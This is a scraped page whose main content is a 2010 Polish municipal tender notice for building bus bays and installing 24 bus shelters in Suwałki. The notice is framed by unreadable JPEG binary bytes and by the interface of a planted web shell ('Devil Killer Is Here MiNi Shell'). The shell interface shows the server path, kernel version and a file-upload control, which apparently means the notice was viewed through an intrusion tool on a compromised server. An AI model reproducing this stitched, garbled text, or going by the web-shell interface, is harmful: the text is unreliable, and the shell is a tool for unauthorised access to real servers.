JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100215/30513-N-2010.html

<p class="kh_header"><b>Suwałki: Budowa zatok autobusowych oraz montaż wiat przystankowych w Suwałkach:
zadanie 1 - Budowa zatok autobusowych wraz z chodnikiem przy ulicy Wojska Polskiego, 
zadanie 2 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Szpitalna, Krzywólka, Nowomiejska, Przemysłowa,
zadanie 3 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Piaskowa, Zarzecze, Noniewicza, Sejneńska, Północna, Świerkowa,
zadanie 4 - Dostawa i montaż  24 wiat przystankowych.</b><br>
<b>Numer ogłoszenia: 30513 - 2010; data zamieszczenia: 15.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Suwałki , ul. Mickiewicza 1, 16-400 Suwałki, woj. podlaskie, tel. 087 5628000, faks 087 5628098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zatok autobusowych oraz montaż wiat przystankowych w Suwałkach:
zadanie 1 - Budowa zatok autobusowych wraz z chodnikiem przy ulicy Wojska Polskiego, 
zadanie 2 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Szpitalna, Krzywólka, Nowomiejska, Przemysłowa,
zadanie 3 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Piaskowa, Zarzecze, Noniewicza, Sejneńska, Północna, Świerkowa,
zadanie 4 - Dostawa i montaż  24 wiat przystankowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  budowa zatok autobusowych oraz montaż wiat przystankowych w Suwałkach:

zadanie 1 - Budowa zatok autobusowych wraz z chodnikiem przy ulicy Wojska Polskiego, 

zadanie 2 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Szpitalna, Krzywólka, Nowomiejska, Przemysłowa,

zadanie 3 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Piaskowa, Zarzecze, Noniewicza, Sejneńska, Północna, Świerkowa,

zadanie 4 - Dostawa i montaż  24 wiat przystankowych. 

2. Lokalizacja montażu wiat przystankowych:
1.	ul. Świerkowa  (pierwszy od ul. Kolejowej w kierunku Osiedla Północ) - wymiana,
2.	ul. Świerkowa  (pierwszy od ulicy Kolejowej w kierunku centrum miasta),
3.	Krzywólka   (pętla)
4.	ul. Mieszka,
5.	ul. Powstańców Wielkopolskich  (w kierunku centrum miasta  k/Lotniczej),
6.	ul. 1 Maja (NOT),
7.	ul. Wojska Polskiego (PBO),
8.	ul. Wojska Polskiego (Laktopol),
9.	ul. Jana Pawła  (przy rondzie z ul. Świerkową),
10.	ul. Piaskowa (PEC),
11.	ul. Szpitalna (Szkoła Podstawowa nr 11),
12.	ul. Buczka (k/Lotniczej),
13.	ul. Sikorskiego (Zespół Szkół Zawodowych),
14.	ul. Grunwaldzka (bazar po stronie cmentarza),
15.	ul. Sikorskiego (koło ronda z E. Plater),
16.	ul. Kościuszki (Dom Nauczyciela),
17.	ul. Północna (Fabryka Mebli),
18.	ul. Noniewicza (Wigry),
19.	ul. Wojska Polskiego (Malow) - wymiana,
20.	ul. Szafirowa (Mispol),
21.	ul. Reja (Biedronka) - wymiana,
22.	ul. Reja (k/Daszyńskiego)- wymiana,
23.	ul. Buczka (IMBUD - w kierunku centrum miasta),
24.	ul. Pułaskiego (J.W.- w kierunku centrum  miasta)

3. Opis techniczny wiat przystankowych:
a.	Materiał: profil zamknięty aluminiowy - grubość ścianki min. 5 mm
b.	Pokrycie dachowe: poliwęglan przyciemniony
c.	Przeszklenie ścian: szyby hartowane wandaloodporne o grubości 8 mm o wymiarach 1 520 mmm x 855 mm posiadające świadectwo bezpieczeństwa CE (podane wymiary szyb są identyczne jak szyb w istniejących na terenie Suwałk wiatach przystankowych)
d.	Siedziska: ławka z tworzywa sztucznego (profil zamknięty) - trudna do zniszczenia, oparcie z tworzywa sztucznego  - trudne do zniszczenia o przekroju około 9,5 x 2,2 cm - siedzisko - 3 listwy, oparcie 2 listwy, kolor zielony lub brązowy
e.	Wymiary wiaty:
-	długość - ok. 4,0 m (wmontowane 4 szyby o wymiarach jw.) - 20 sztuk
- 	długość - ok. 5,0 m  (wmontowane 5 szyb o wymiarach jw.) - 4 sztuk
-	szerokość ścianki bocznej od 1,0 m do 1,2 m (wmontowana szyba o wymiarach jw.)
-	dolna część wiaty wypełniona blachą aluminiową
-	wysokość ni mniejsza niż 2,2 m (do konstrukcji dachu),
- dach wysunięty poza konstrukcję wiaty od strony wejścia do wiaty (okap) nie mniejszy niż 60 cm,
-	wiata wyposażona w dwie ramki poziome o wymiarach ok. 64,5 x 33 cm na rozkłady jazdy 
f.	Słupek przystankowy:
- ocynkowany i pomalowany podwójny 
- z zamontowanymi dwiema ramkami poziomymi o wymiarach ok. 64,5 x 33 cm na rozkłady jazdy - ramki zabezpieczone od góry przed działaniem opadów atmosferycznych (zdjęcie - załącznik nr 2.4)
-	z zamontowanym koszem na śmieci
-	ze znakiem przystankowym D - 15 - I generacja, typ średni
g.	Posadowienie - fundamenty prefabrykowane punktowe
	
4. Szczegółowy zakres robót dot. zadania 1, 2 i 3 zwierają załączone projekty, przedmiary robót oraz  szczegółowe specyfikacje techniczne.

5. Zamówienia będą realizowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007 - 2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 44.21.23.21-5, 45.21.33.15-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca zapewni jako część swojej oferty wadium w wysokości: 33.000,00 zł (słownie złotych: trzydzieści trzy tysiące) na całość zamówienia w tym:
zadanie 1 - 10.000,00 zł (dziesięć tysięcy złotych),
zadanie 2 - 12.000,00 zł (dwanaście  tysięcy złotych),
zadanie 3 - 8.000,00 zł (osiem tysięcy złotych),
zadanie 4 - 3.000,00 zł (trzy tysiące złotych)

2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r Nr 42 poz.275).

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Miejskiej Dyrekcji Inwestycji w Suwałkach w Banku PKO SA O/Białystok nr 82 1240 5211 1111 0000 4921 9731 w terminie do dnia  05.03.2010 r. do godz. 10:00 (decyduje data wpływu środków na rachunek zamawiającego). Kserokopię dowodu wniesienia wadium należy złożyć w ofercie. 
Wadium w pozostałych formach - oryginały - muszą być wniesione w sekretariacie (pokój 115) Miejskiej Dyrekcji Inwestycji w Suwałkach, ul. Sejneńska 82.
Oznacza to, że w terminie wniesienia wadium, w sekretariacie MDI muszą zostać złożone ww. formy wadium. Wykonawca - dla celów dowodowych - powinien uzyskać dla siebie potwierdzenie złożenia wadium w Sekretariacie MDI.
3. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
4. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania 1 i 3
posiadania wiedzy i doświadczenia; tj. udokumentują, wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane polegające na budowie lub przebudowie chodników z kostki betonowej i nawierzchni z kostki kamiennej na łączną kwotę nie mniejszą niż 1.000.000,00 zł brutto;
Dotyczy zadania2
posiadania wiedzy i doświadczenia; tj. udokumentują, wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane polegające na budowie lub przebudowie chodników oraz dróg o nawierzchni asfaltowej o łącznej  wartości nie mniejszej niż  1.500.000,00 zł.
Dotyczy zadania 4
posiadania wiedzy i doświadczenia; tj. wykonawcy winni udokumentować, wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane polegające na dostawie  i montażu wiat przystankowych w łącznej ilości nie mniejszej niż 24 sztuki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania 1,2,3
Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; tj: kierownikiem budowy z uprawnieniami budowlanymi do kierowania robotami budowlanymi w specjalności drogowej zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r (tj. Dz. U. z 2006 r, Nr 156, poz. 1118 z późn. zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania 1,2,3,4
sytuacji ekonomicznej i finansowej, tj. są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mdi.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Dyrekcja Inwestycji
ul. Sejneńska 82
16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 10:00, miejsce: Miejska Dyrekcja Inwestycji
ul. Sejneńska 82
16-400 Suwałki
pokój nr 115 - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Podlaskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1 - Budowa zatok autobusowych wraz z chodnikiem przy ulicy Wojska Polskiego,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót zawierają załączone do SIWZ przedmiary, projekty oraz szczegółowe specyfikace techniczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Szpitalna, Krzywólka, Nowomiejska, Przemysłowa,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót zawierają załączone do SIWZ przedmiary robót, projekty oraz szczegółowe specyfikacje techniczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie 3 - Budowa zatok autobusowych wraz z chodnikiem przy ulicach Piaskowa, Zarzecze, Noniewicza, Sejneńska, Północna, Świerkowa,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót zawierają załączone przedmiaru robót, projekty i szczegółowe specyfikacje techniczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie 4 - Dostawa i montaż  24 wiat przystankowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie 4 - Dostawa i montaż  24 wiat przystankowych. 

2. Lokalizacja montażu wiat przystankowych:
1.	ul. Świerkowa  (pierwszy od ul. Kolejowej w kierunku Osiedla Północ) - wymiana,
2.	ul. Świerkowa  (pierwszy od ulicy Kolejowej w kierunku centrum miasta),
3.	Krzywólka   (pętla)
4.	ul. Mieszka,
5.	ul. Powstańców Wielkopolskich  (w kierunku centrum miasta  k/Lotniczej),
6.	ul. 1 Maja (NOT),
7.	ul. Wojska Polskiego (PBO),
8.	ul. Wojska Polskiego (Laktopol),
9.	ul. Jana Pawła  (przy rondzie z ul. Świerkową),
10.	ul. Piaskowa (PEC),
11.	ul. Szpitalna (Szkoła Podstawowa nr 11),
12.	ul. Buczka (k/Lotniczej),
13.	ul. Sikorskiego (Zespół Szkół Zawodowych),
14.	ul. Grunwaldzka (bazar po stronie cmentarza),
15.	ul. Sikorskiego (koło ronda z E. Plater),
16.	ul. Kościuszki (Dom Nauczyciela),
17.	ul. Północna (Fabryka Mebli),
18.	ul. Noniewicza (Wigry),
19.	ul. Wojska Polskiego (Malow) - wymiana,
20.	ul. Szafirowa (Mispol),
21.	ul. Reja (Biedronka) - wymiana,
22.	ul. Reja (k/Daszyńskiego)- wymiana,
23.	ul. Buczka (IMBUD - w kierunku centrum miasta),
24.	ul. Pułaskiego (J.W.- w kierunku centrum  miasta)

3. Opis techniczny wiat przystankowych:
a.	Materiał: profil zamknięty aluminiowy - grubość ścianki min. 5 mm
b.	Pokrycie dachowe: poliwęglan przyciemniony
c.	Przeszklenie ścian: szyby hartowane wandaloodporne o grubości 8 mm o wymiarach 1 520 mmm x 855 mm posiadające świadectwo bezpieczeństwa CE (podane wymiary szyb są identyczne jak szyb w istniejących na terenie Suwałk wiatach przystankowych)
d.	Siedziska: ławka z tworzywa sztucznego (profil zamknięty) - trudna do zniszczenia, oparcie z tworzywa sztucznego  - trudne do zniszczenia o przekroju około 9,5 x 2,2 cm - siedzisko - 3 listwy, oparcie 2 listwy, kolor zielony lub brązowy
e.	Wymiary wiaty:
-	długość - ok. 4,0 m (wmontowane 4 szyby o wymiarach jw.) - 20 sztuk
- 	długość - ok. 5,0 m  (wmontowane 5 szyb o wymiarach jw.) - 4 sztuk
-	szerokość ścianki bocznej od 1,0 m do 1,2 m (wmontowana szyba o wymiarach jw.)
-	dolna część wiaty wypełniona blachą aluminiową
-	wysokość ni mniejsza niż 2,2 m (do konstrukcji dachu),
- dach wysunięty poza konstrukcję wiaty od strony wejścia do wiaty (okap) nie mniejszy niż 60 cm,
-	wiata wyposażona w dwie ramki poziome o wymiarach ok. 64,5 x 33 cm na rozkłady jazdy 
f.	Słupek przystankowy:
- ocynkowany i pomalowany podwójny 
- z zamontowanymi dwiema ramkami poziomymi o wymiarach ok. 64,5 x 33 cm na rozkłady jazdy - ramki zabezpieczone od góry przed działaniem opadów atmosferycznych (zdjęcie - załącznik nr 2.4)
-	z zamontowanym koszem na śmieci
-	ze znakiem przystankowym D - 15 - I generacja, typ średni
g.	Posadowienie - fundamenty prefabrykowane punktowe
	
